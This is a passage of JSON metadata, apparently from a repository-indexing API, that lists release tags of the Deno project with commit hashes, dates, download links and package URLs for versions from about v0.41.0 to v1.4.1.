kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https:/